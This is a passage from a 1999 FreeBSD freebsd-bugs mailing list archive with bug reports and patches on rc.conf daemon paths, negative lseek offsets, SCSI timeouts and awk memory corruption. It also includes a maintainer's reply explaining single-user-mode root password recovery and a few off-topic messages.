/etc/sendmail.cf ]; then ! echo -n ' sendmail'; ${sendmail_program} ${sendmail_flags} fi if [ "X${usbd_enable}" = X"YES" ]; then *** defaults/rc.conf.orig Mon Sep 6 00:40:54 1999 --- defaults/rc.conf Mon Sep 6 00:42:59 1999 *************** *** 66,73 **** --- 66,75 ---- ### Network daemon (miscellaneous) & NFS options: ### syslogd_enable="YES" # Run syslog daemon (or NO). + syslogd_program="syslogd" # path to syslogd, if you want a different one. syslogd_flags="" # Flags to syslogd (if enabled). inetd_enable="YES" # Run the network daemon dispatcher (or NO). + inetd_program="inetd" # path to inetd, if you want a different one. inetd_flags="-wW" # Optional flags to inetd. # # named. It may be possible to run named in a sandbox, man security for *************** *** 200,205 **** --- 202,208 ---- usbd_enable="NO" # Run the usbd daemon. usbd_flags="" # Flags to usbd (if enabled). sendmail_enable="YES" # Run the sendmail daemon (or NO). + sendmail_program="/usr/sbin/sendmail" # path to sendmail, if you want a different one. sendmail_flags="-bd -q30m" # Flags to sendmail (if enabled) dumpdev="NO" # Device name to crashdump to (if enabled). enable_quotas="NO" # turn on quotas on startup (or NO). >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 1:40:46 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4377614EBB for ; Tue, 7 Sep 1999 01:40:42 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA89146; Tue, 7 Sep 1999 01:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Tue, 7 Sep 1999 01:40:02 -0700 (PDT) Message-Id: <199909070840.BAA89146@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Subject: Re: kern/6184: No error if resulting file pos in lseek is negative Reply-To: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/6184; it has been noted by GNATS. From: To: FreeBSD-gnats-submit@freebsd.org Cc: phk@FreeBSD.org, des@FreeBSD.org Subject: Re: kern/6184: No error if resulting file pos in lseek is negative Date: Tue, 7 Sep 1999 01:34:55 -0700 (PDT) This is a multipart MIME message. --==_Exmh_-3322228240 Content-Type: text/plain The patch given in the PR seems fine. I've touched it up a little to avoid some style nits and have reworded the manual page to make the behaviour clearer. A small test program is included. Any reason why this shouldn't go into -current? If there aren't any objections, I'd like to commit this and take the change up with JKH for merging to 3.3-RC. Regards, Koshy --==_Exmh_-3322228240 Content-Type: text/plain ; name="a.c" Content-Description: test-program Content-Disposition: attachment; filename="a.c" #include #include #include #include #include int main(int argc, char **argv) { char *Name = "myfile"; int pos, fd = open(Name,O_WRONLY | O_CREAT,0777); write(fd,"ABCDEFGH",8); close(fd); fd = open(Name,O_RDONLY); #define fail 1 #define succeed 0 #define TEST_LSEEK(whence, value, shouldfail) do {\ printf("> " #whence "(%d): ", value); \ pos = lseek(fd, value, whence); \ printf((shouldfail ? (pos == -1) : (pos >= 0)) ? "pass\n" : "fail\n"); \ (void) lseek(fd, 0, SEEK_SET); \ } while (0) TEST_LSEEK(SEEK_CUR, -5, fail); TEST_LSEEK(SEEK_CUR, +5, succeed); TEST_LSEEK(SEEK_CUR, +10, succeed); TEST_LSEEK(SEEK_SET, -5, fail); TEST_LSEEK(SEEK_SET, +5, succeed); TEST_LSEEK(SEEK_SET, +10, succeed); TEST_LSEEK(SEEK_END, -10, fail); TEST_LSEEK(SEEK_END, -5, succeed); TEST_LSEEK(SEEK_END, +10, succeed); return 0; } --==_Exmh_-3322228240 Content-Type: text/plain ; name="foo" Content-Description: revised-lseek-patch Content-Disposition: attachment; filename="foo" Index: sys/kern/vfs_syscalls.c =================================================================== RCS file: /home/ncvs/src/sys/kern/vfs_syscalls.c,v retrieving revision 1.130 diff -u -r1.130 vfs_syscalls.c --- vfs_syscalls.c 1999/08/12 20:38:32 1.130 +++ vfs_syscalls.c 1999/09/07 12:28:15 @@ -1423,6 +1423,7 @@ register struct file *fp; struct vattr vattr; int error; + off_t ofs; if ((u_int)SCARG(uap, fd) >= fdp->fd_nfiles || (fp = fdp->fd_ofiles[SCARG(uap, fd)]) == NULL) @@ -1431,21 +1432,23 @@ return (ESPIPE); switch (SCARG(uap, whence)) { case L_INCR: - fp->f_offset += SCARG(uap, offset); + ofs = fp->f_offset + SCARG(uap, offset); break; case L_XTND: error=VOP_GETATTR((struct vnode *)fp->f_data, &vattr, cred, p); if (error) return (error); - fp->f_offset = SCARG(uap, offset) + vattr.va_size; + ofs = SCARG(uap, offset) + vattr.va_size; break; case L_SET: - fp->f_offset = SCARG(uap, offset); + ofs = SCARG(uap, offset); break; default: return (EINVAL); } - *(off_t *)(p->p_retval) = fp->f_offset; + if (ofs < 0) + return (EINVAL); + *(off_t *)(p->p_retval) = fp->f_offset = ofs; return (0); } Index: lib/libc/sys/lseek.2 =================================================================== RCS file: /home/ncvs/src/lib/libc/sys/lseek.2,v retrieving revision 1.8 diff -u -r1.8 lseek.2 --- lseek.2 1998/04/19 22:20:08 1.8 +++ lseek.2 1999/09/07 13:03:50 @@ -95,6 +95,7 @@ of the existing end-of-file of the file. If data is later written at this point, subsequent reads of the data in the gap return bytes of zeros (until data is actually written into the gap). +Setting the file offset to negative values is not permitted. .Pp Some devices are incapable of seeking. The value of the pointer associated with such a device is undefined. @@ -120,7 +121,7 @@ is associated with a pipe, socket, or FIFO. .It Bq Er EINVAL .Fa Whence -is not a proper value. +is not a proper value or the resulting file offset would be negative. .El .Sh SEE ALSO .Xr dup 2 , --==_Exmh_-3322228240-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 2:12:14 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 027181555D for ; Tue, 7 Sep 1999 02:12:10 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA99371; Tue, 7 Sep 1999 02:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from saturn.sees.bangor.ac.uk (saturn.sees.bangor.ac.uk [147.143.102.11]) by hub.freebsd.org (Postfix) with ESMTP id 6127F14F7B for ; Tue, 7 Sep 1999 02:03:56 -0700 (PDT) (envelope-from andy@sees.bangor.ac.uk) Received: from idris.sees.bangor.ac.uk (idris.sees.bangor.ac.uk [147.143.9.79]) by saturn.sees.bangor.ac.uk (8.8.8/8.8.8) with ESMTP id KAA00826 for ; Tue, 7 Sep 1999 10:03:47 +0100 (BST) Received: by idris.sees.bangor.ac.uk (8.9.3) id KAA01987; Tue, 7 Sep 1999 10:02:12 +0100 (BST) Message-Id: <199909070902.KAA01987@idris.sees.bangor.ac.uk> Date: Tue, 7 Sep 1999 10:02:12 +0100 (BST) From: Dr A W G Duller Reply-To: andy@sees.bangor.ac.uk To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/13612: "Timedout SCB handled by another timeout" on dual processor Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13612 >Category: kern >Synopsis: "Timedout SCB handled by another timeout" on dual processor >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 02:10:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Dr A W G Duller >Release: FreeBSD 3.2-RELEASE i386 >Organization: University of Wales, Bangor, UK >Environment: Extract from /var/log/message Sep 2 13:50:19 idris /kernel: meteor0: ioctl: tsleep error -1 Sep 2 13:50:31 idris last message repeated 2 times Sep 2 13:52:36 idris /kernel: Timedout SCB handled by another timeout Sep 2 13:54:37 idris /kernel: Timedout SCB handled by another timeout Sep 2 13:56:36 idris /kernel: Timedout SCB handled by another timeout Sep 2 13:56:36 idris /kernel: meteor0: ioctl: tsleep error -1 Sep 2 13:58:36 idris /kernel: Timedout SCB handled by another timeout Sep 2 14:19:33 idris /kernel: Copyright (c) 1992-1999 FreeBSD Inc. Sep 2 14:19:33 idris /kernel: Copyright (c) 1982, 1986, 1989, 1991, 1993 Sep 2 14:19:33 idris /kernel: The Regents of the University of California. All rights reserved. Sep 2 14:19:33 idris /kernel: FreeBSD 3.2-RELEASE #5: Mon Jul 12 09:41:57 BST 1999 Sep 2 14:19:33 idris /kernel: andy@idris.sees.bangor.ac.uk:/usr/src/sys/compile/IDRIS Sep 2 14:19:33 idris /kernel: Timecounter "i8254" frequency 1193182 Hz Sep 2 14:19:33 idris /kernel: CPU: Pentium III (686-class CPU) Sep 2 14:19:33 idris /kernel: Origin = "GenuineIntel" Id = 0x673 Stepping=3 Sep 2 14:19:33 idris /kernel: Features=0x387fbff,MMX,,> Sep 2 14:19:33 idris /kernel: real memory = 536870912 (524288K bytes) Sep 2 14:19:34 idris /kernel: avail memory = 520024064 (507836K bytes) Sep 2 14:19:34 idris /kernel: Programming 24 pins in IOAPIC #0 Sep 2 14:19:34 idris /kernel: FreeBSD/SMP: Multiprocessor motherboard Sep 2 14:19:34 idris /kernel: cpu0 (BSP): apic id: 1, version: 0x00040011, at 0xfee00000 Sep 2 14:19:34 idris /kernel: cpu1 (AP): apic id: 0, version: 0x00040011, at 0xfee00000 Sep 2 14:19:34 idris /kernel: io0 (APIC): apic id: 2, version: 0x00170011, at 0xfec00000 Sep 2 14:19:34 idris /kernel: Preloaded elf kernel "kernel" at 0xc02bf000. Sep 2 14:19:34 idris /kernel: Probing for devices on PCI bus 0: Sep 2 14:19:34 idris /kernel: chip0: rev 0x00 on pci0.0.0 Sep 2 14:19:34 idris /kernel: chip1: rev 0x00 on pci0.1.0 Sep 2 14:19:34 idris /kernel: ahc0: rev 0x00 int a irq 11 on pci0.12.0 Sep 2 14:19:34 idris /kernel: ahc0: aic7896/97 Wide Channel A, SCSI Id=7, 16/255 SCBs Sep 2 14:19:34 idris /kernel: ahc1: rev 0x00 int a irq 11 on pci0.12.1 Sep 2 14:19:34 idris /kernel: ahc1: aic7896/97 Wide Channel B, SCSI Id=7, 16/255 SCBs Sep 2 14:19:34 idris /kernel: meteor0: rev 0x00 int a irq 11 on pci0.13.0 Sep 2 14:19:34 idris /kernel: meteor0: rev 0x1 Sep 2 14:19:34 idris /kernel: fxp0: rev 0x08 int a irq 10 on pci0.14.0 Sep 2 14:19:34 idris /kernel: fxp0: Ethernet address 00:a0:c9:ac:a5:98 Sep 2 14:19:34 idris /kernel: adv0: rev 0x03 int a irq 5 on pci0.16.0 Sep 2 14:19:34 idris /kernel: adv0: AdvanSys Ultra SCSI Host Adapter, SCSI ID 7, queue depth 240 Sep 2 14:19:34 idris /kernel: chip2: rev 0x02 on pci0.18.0 Sep 2 14:19:34 idris /kernel: chip3: rev 0x02 on pci0.18.3 Sep 2 14:19:34 idris /kernel: vga0: rev 0x23 on pci0.20.0 Sep 2 14:19:34 idris /kernel: Probing for devices on PCI bus 1: Sep 2 14:19:34 idris /kernel: chip4: rev 0x06 on pci1.15.0 Sep 2 14:19:34 idris /kernel: Probing for devices on PCI bus 2: Sep 2 14:19:34 idris /kernel: vga1: rev 0x01 int a irq 11 on pci2.4.0 Sep 2 14:19:34 idris /kernel: Probing for PnP devices: Sep 2 14:19:34 idris /kernel: Probing for devices on the ISA bus: Sep 2 14:19:34 idris /kernel: sc0 on isa Sep 2 14:19:34 idris /kernel: sc0: VGA color <16 virtual consoles, flags=0x0> Sep 2 14:19:34 idris /kernel: atkbdc0 at 0x60-0x6f on motherboard Sep 2 14:19:34 idris /kernel: atkbd0 irq 1 on isa Sep 2 14:19:34 idris /kernel: psm0 irq 12 on isa Sep 2 14:19:34 idris /kernel: psm0: model Generic PS/2 mouse, device ID 0 Sep 2 14:19:34 idris /kernel: sio0 at 0x3f8-0x3ff irq 4 flags 0x10 on isa Sep 2 14:19:34 idris /kernel: sio0: type 16550A Sep 2 14:19:34 idris /kernel: sio1 at 0x2f8-0x2ff irq 3 on isa Sep 2 14:19:34 idris /kernel: sio1: type 16550A Sep 2 14:19:34 idris /kernel: fdc0 at 0x3f0-0x3f7 irq 6 drq 2 on isa Sep 2 14:19:34 idris /kernel: fdc0: FIFO enabled, 8 bytes threshold Sep 2 14:19:34 idris /kernel: fd0: 1.44MB 3.5in Sep 2 14:19:34 idris /kernel: ppc0 at 0x378 irq 7 flags 0x40 on isa Sep 2 14:19:34 idris /kernel: ppc0: Generic chipset (NIBBLE-only) in COMPATIBLE mode Sep 2 14:19:34 idris /kernel: lpt0: on ppbus 0 Sep 2 14:19:34 idris /kernel: lpt0: Interrupt-driven port Sep 2 14:19:34 idris /kernel: ppi0: on ppbus 0 Sep 2 14:19:34 idris /kernel: plip0: on ppbus 0 Sep 2 14:19:34 idris /kernel: lpt0: on ppbus 0 Sep 2 14:19:34 idris /kernel: lpt0: Interrupt-driven port Sep 2 14:19:34 idris /kernel: adv0 not found at 0x330 Sep 2 14:19:34 idris /kernel: vga0 at 0x3b0-0x3df maddr 0xa0000 msize 131072 on isa Sep 2 14:19:34 idris /kernel: npx0 on motherboard Sep 2 14:19:34 idris /kernel: npx0: INT 16 interface Sep 2 14:19:34 idris /kernel: APIC_IO: Testing 8254 interrupt delivery Sep 2 14:19:34 idris /kernel: APIC_IO: routing 8254 via pin 2 Sep 2 14:19:34 idris /kernel: Waiting 15 seconds for SCSI devices to settle Sep 2 14:19:34 idris /kernel: SMP: AP CPU #1 Launched! Sep 2 14:19:35 idris /kernel: changing root device to da0s2a Sep 2 14:19:35 idris /kernel: cd0 at adv0 bus 0 target 0 lun 0 Sep 2 14:19:35 idris /kernel: cd0: Removable CD-ROM SCSI-2 device Sep 2 14:19:35 idris /kernel: cd0: 10.000MB/s transfers (10.000MHz, offset 15) Sep 2 14:19:35 idris /kernel: cd0: Attempt to query device size failed: NOT READY, Medium not present Sep 2 14:19:35 idris /kernel: da1 at ahc0 bus 0 target 1 lun 0 Sep 2 14:19:35 idris /kernel: da1: Fixed Direct Access SCSI-2 device Sep 2 14:19:35 idris /kernel: da1: 80.000MB/s transfers (40.000MHz, offset 15, 16bit), Tagged Queueing Enabled Sep 2 14:19:35 idris /kernel: da1: 8715MB (17850000 512 byte sectors: 255H 63S/T 1111C) Sep 2 14:19:35 idris /kernel: da0 at ahc0 bus 0 target 0 lun 0 Sep 2 14:19:35 idris /kernel: da0: Fixed Direct Access SCSI-2 device Sep 2 14:19:35 idris /kernel: da0: 80.000MB/s transfers (40.000MHz, offset 15, 16bit), Tagged Queueing Enabled Sep 2 14:19:35 idris /kernel: da0: 8715MB (17850000 512 byte sectors: 255H 63S/T 1111C) >Description: Under heavily loaded conditions (copying a 180Mb file at the same time as image grabbing and processing using the Matrox Meteor card the error message: "Timedout SCB handled by another timeout" appears and all operations are performed extremely slowly (several minutes to perform an ls). The only cure seems to be a reboot. >How-To-Repeat: It appears hard to duplicate when required but has happened twice, both times the Matrox Meteor was in use and the "/kernel: meteor0: ioctl: tsleep error -1" appeared a few minutes before. >Fix: None known. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 3: 2:28 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id E83D9155A6; Tue, 7 Sep 1999 03:02:18 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.02 #1) id 11OI4h-000CWA-00; Tue, 07 Sep 1999 12:02:03 +0200 From: Sheldon Hearn To: jkoshy@FreeBSD.ORG Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/6184: No error if resulting file pos in lseek is negative In-reply-to: Your message of "Tue, 07 Sep 1999 01:40:02 MST." <199909070840.BAA89146@freefall.freebsd.org> Date: Tue, 07 Sep 1999 12:02:03 +0200 Message-ID: <48121.936698523@axl.noc.iafrica.com> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 07 Sep 1999 01:40:02 MST, jkoshy@FreeBSD.ORG wrote: > .It Bq Er EINVAL > .Fa Whence > -is not a proper value. > +is not a proper value or the resulting file offset would be negative. ^^^ Stick a comma in there to emphasise for English-speaking people that these are two distinct possibilities. Funnily enough, people whose native language is not English usually interpret this sort of sentence correctly. :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 6:11: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ADF35155AD for ; Tue, 7 Sep 1999 06:11:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA28202; Tue, 7 Sep 1999 06:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from zorch.sf-bay.org (zorch.sf-bay.org [192.150.103.17]) by hub.freebsd.org (Postfix) with ESMTP id A1F1B14F0B for ; Tue, 7 Sep 1999 06:08:10 -0700 (PDT) (envelope-from scott@zorch.sf-bay.org) Received: (from uucp@localhost) by zorch.sf-bay.org (8.8.8/8.8.2) with UUCP id GAA17452 for FreeBSD-gnats-submit@freebsd.org; Tue, 7 Sep 1999 06:06:23 -0700 (PDT) Received: (from scott@localhost) by zorba.sf-bay.org (8.9.3/8.8.8) id VAA12164; Tue, 7 Sep 1999 21:03:43 +0800 (CST) (envelope-from scott) Message-Id: <199909071303.VAA12164@zorba.sf-bay.org> Date: Tue, 7 Sep 1999 21:03:43 +0800 (CST) From: Scott Hazen Mueller Reply-To: scott@zorch.sf-bay.org To: FreeBSD-gnats-submit@freebsd.org Cc: scott@zorch.sf-bay.org X-Send-Pr-Version: 3.2 Subject: bin/13615: awk bug Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13615 >Category: bin >Synopsis: awk corrupts the memory arena when OFMT is not %.6g >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 06:10:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Scott Hazen Mueller >Release: FreeBSD 3.2-RELEASE i386 >Organization: none >Environment: The code originates in C News, however all C News dependencies have been removed from the supplied test case. >Description: When the supplied script is run against the supplied test data with OFMT unset or set to the default %.6g, the script completes normally. If OFMT is set to a value other than %.6g (values tested from %.7g to %.12g), the script generates numerous awk in free(): warning: chunk is already free. warnings. Additionally, variable values change unexpectedly in apparent response to assignment of other variables. This is the output of a "normal" run: 123123123123 1e+11 now0 123123123123 123123123123 1e+11 <--- 1st checkpoint now1 123123123123 0 1e+11 now2 123123123123 0 1e+11 123123123123 456456456456 1e+11 now0 456456456456 456456456456 1e+11 <--- 2nd checkpoint now1 456456456456 0 1e+11 now2 456456456456 0 1e+11 456456456456 789789789789 1e+11 now0 789789789789 789789789789 1e+11 <--- 3rd checkpoint now1 789789789789 0 1e+11 now2 789789789789 0 1e+11 This is the output when OFMT is %.7g: 1.231231e+11 1e+11 awk in free(): warning: chunk is already free. now0 123123123123 1e+11 1e+11 <--- 1st checkpoint awk in free(): warning: chunk is already free. now1 123123123123 1e+11 1e+11 now2 123123123123 1e+11 1e+11 awk in free(): warning: chunk is already free. 123123123123 4.564564e+11 4.564564e+11 now0 456456456456 456456456456 456456456456 <--- 2nd checkpoint awk in free(): warning: chunk is already free. awk in free(): warning: chunk is already free. now1 0 0 0 <--- error awk in free(): warning: chunk is already free. awk in free(): warning: chunk is already free. now2 0 0 0 awk in free(): warning: chunk is already free. awk in free(): warning: chunk is already free. 7.897898e+11 7.897898e+11 7.897898e+11 <--- 3rd checkpoint awk in free(): warning: chunk is already free. awk in free(): warning: chunk is already free. now1 6.653991e-316 6.653991e-316 6.653991e-316 <--- error awk in free(): warning: chunk is already free. awk in free(): warning: chunk is already free. now2 9.999994e+10 9.999994e+10 9.999994e+10 Note that in the second output set, the variable values went to '0 0 0' between the 2nd and 3rd checkpoint, and went to 6.65e-316 after the 3rd checkpoint. These output lines are indicated with 'error'. >How-To-Repeat: awk script: BEGIN { OFMT = "%.7g" #OFMT = "%.6g" big = 99999999999 lowest = big small = 0 highest = small dir = "" } { if ($1 < lowest) lowest = $1 if ($1 > highest) highest = $1 print dir, highest, lowest dir = $0 print "now0 ", dir, highest, lowest highest = small print "now1 ", dir, highest, lowest lowest = big print "now2 ", dir, highest, lowest } input file: 123123123123 456456456456 789789789789 Execute awk -f script Fix: Setting OFMT to %.6g seems to cause normal behavior, at the loss of flexibility in formatting the output. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 6:32:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp.EUnet.yu (smtp.EUnet.yu [194.247.192.50]) by hub.freebsd.org (Postfix) with ESMTP id CCA1414EE4 for ; Tue, 7 Sep 1999 06:32:00 -0700 (PDT) (envelope-from inbroker@EUnet.yu) Received: from inbroker (P-0.156.EUnet.yu [213.240.0.156]) by smtp.EUnet.yu (8.9.3/8.9.3) with SMTP id PAA13850 for ; Tue, 7 Sep 1999 15:31:10 +0200 (MET DST) Message-ID: <000801bef980$99a4d840$9c00f0d5@inbroker> From: "InterBroker" To: Subject: loading profile of russian railway Date: Tue, 7 Sep 1999 15:30:23 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01BEF945.E760E820" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0005_01BEF945.E760E820 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable dear sir please would you be so kind to submit to us profile of loading for = Russian railway e.g. maximal dimension for width and height Thanks in advance=20 InterBroker Jovic/Grujic ------=_NextPart_000_0005_01BEF945.E760E820 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
dear sir
please would you be so kind to submit = to us profile=20 of loading for Russian railway
e.g. maximal dimension for width and=20 height
 
Thanks in advance
 
InterBroker
Jovic/Grujic
 
------=_NextPart_000_0005_01BEF945.E760E820-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 6:50:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0937715586 for ; Tue, 7 Sep 1999 06:50:12 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA80297; Tue, 7 Sep 1999 06:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id CE1BA14D70; Tue, 7 Sep 1999 06:40:06 -0700 (PDT) Message-Id: <19990907134006.CE1BA14D70@hub.freebsd.org> Date: Tue, 7 Sep 1999 06:40:06 -0700 (PDT) From: mkusk@metcredit.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/13616: The guy who set up my mail server changed the password. Can I find it? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 13616 >Category: misc >Synopsis: The guy who set up my mail server changed the password. Can I find it? >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Tue Sep 7 06:50:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Mike Kusk >Release: not sure >Organization: Metro Credit. >Environment: >Description: >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 7: 2:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4AA7614D11; Tue, 7 Sep 1999 07:02:09 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA80882; Tue, 7 Sep 1999 07:00:18 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Tue, 7 Sep 1999 07:00:18 -0700 (PDT) From: Message-Id: <199909071400.HAA80882@freefall.freebsd.org> To: mkusk@metcredit.com, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/13616: The guy who set up my mail server changed the password. Can I find it? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: The guy who set up my mail server changed the password. Can I find it? State-Changed-From-To: open->closed State-Changed-By: sheldonh State-Changed-When: Tue Sep 7 06:55:09 PDT 1999 State-Changed-Why: This isn't really what the PR database is for. What you need to do is send e-mail to questions@freebsd.org, explaining what version of FreeBSD you are running. However, I can tell you that if you're running 3.2-RELEASE or later, you can press spacebar at the pre-boot countdown, which will take you to a prompt at which you can type ``boot -s'' without the quotes and press enter. This will drop you into single-user mode. Once in single-user mode, you can do ``mount -a'', again without the quotes, and then change root's password with the command ``passwd''. If that doesn't help you, see my first paragraph. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 9:17:15 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from dutton3.it.siu.edu (dutton3.it.siu.edu [131.230.6.142]) by hub.freebsd.org (Postfix) with ESMTP id 721A714E19 for ; Tue, 7 Sep 1999 09:16:59 -0700 (PDT) (envelope-from jimd@dutton3.it.siu.edu) Received: from dutton3.it.siu.edu (localhost [127.0.0.1]) by dutton3.it.siu.edu (8.9.3/8.9.3/8.9.3.1) with ESMTP id LAA42600 for ; Tue, 7 Sep 1999 11:15:40 -0500 (CDT) Message-ID: <37D53A2B.55C0D8D2@dutton3.it.siu.edu> Date: Tue, 07 Sep 1999 11:15:39 -0500 From: Jim Dutton Organization: Southern Illinois University X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: Y2K Checking BIOS via FreeBSD (i.e., no DOS/Windows) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a FreeBSD/"Unix" utility to check the system BIOS for Y2K compatibility? I have three such systems with no DOS or Windows. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 10: 1:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 583) id D163214C29; Tue, 7 Sep 1999 10:01:29 -0700 (PDT) To: freebsd-bugs@FreeBSD.ORG, jkoshy@FreeBSD.ORG Subject: Re: kern/6184: No error if resulting file pos in lseek is negative In-Reply-To: <199909070840.BAA89146@freefall.freebsd.org> Message-Id: <19990907170129.D163214C29@hub.freebsd.org> Date: Tue, 7 Sep 1999 10:01:29 -0700 (PDT) From: bde@FreeBSD.ORG (Bruce Evans) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Any reason why this shouldn't go into -current? If there aren't any Yes, it breaks seeking to half of the address space in /dev/mem and dev/kmem on 64-bit machines. The maximum value for an lseek() offset depends on the file. I think POSIX indirectly requires checking against the limit at lseek() time, at least for regular files, since there is no Standard way for read(2) to report failure due to an invalid offset (FreeBSD documents returning EINVAL, but ufs actually returns EFBIG). Applications still need to be careful about seeking to (off_t)-1 if they actually want to do this, since (off_t)-1 may be a valid seek offset. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Sep 7 12:39:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from sussande01.sandiegoca.ncr.com (tan7.ncr.com [192.127.94.7]) by hub.freebsd.org (Postfix) with ESMTP id 7353B14CF5 for ; Tue, 7 Sep 1999 12:39:08 -0700 (PDT) (envelope-from RI122065@exchange.SanDiegoCA.NCR.COM) Received: by sussande01.SanDiegoCA.NCR.COM with Internet Mail Service (5.5.2448.0) id ; Tue, 7 Sep 1999 12:38:40 -0700 Message-ID: From: "Ingram, Russell" To: freebsd-bugs@FreeBSD.ORG Cc: "RFI@home" Subject: kern/12979: 